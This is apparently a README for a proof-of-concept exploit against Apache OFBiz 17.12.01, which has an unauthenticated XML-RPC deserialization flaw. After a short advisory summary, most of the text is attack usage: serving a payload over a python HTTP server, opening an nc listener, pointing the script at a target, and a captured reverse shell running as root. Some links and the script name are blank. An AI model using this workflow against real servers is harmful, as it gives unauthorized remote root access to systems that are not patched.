
Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz from the GitHub Security Lab team.

Affected Version 17.12.01

Fixed Versions 18.12.01, 17.12.04

Original Blog:
Apache's Post:
Github's POC:

In order to make this exploit work, you will need to make the following steps:

Step 1: Host HTTP Service with python3

> sudo python3 -m http.server 80

Step 2: Run nc listener in the desired port (Recommended 8001)

> nc -nlvp 8001

Step 3: Change Website's URL and Port inside the script:

url='' # CHANGE THIS                                                         
port=8443 # CHANGE THIS

Step 4: Run the exploit as shown below

> ./ -i IP -p PORT

Step 5: Check nc listener

❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
uid=0(root) gid=0(root) groups=0(root)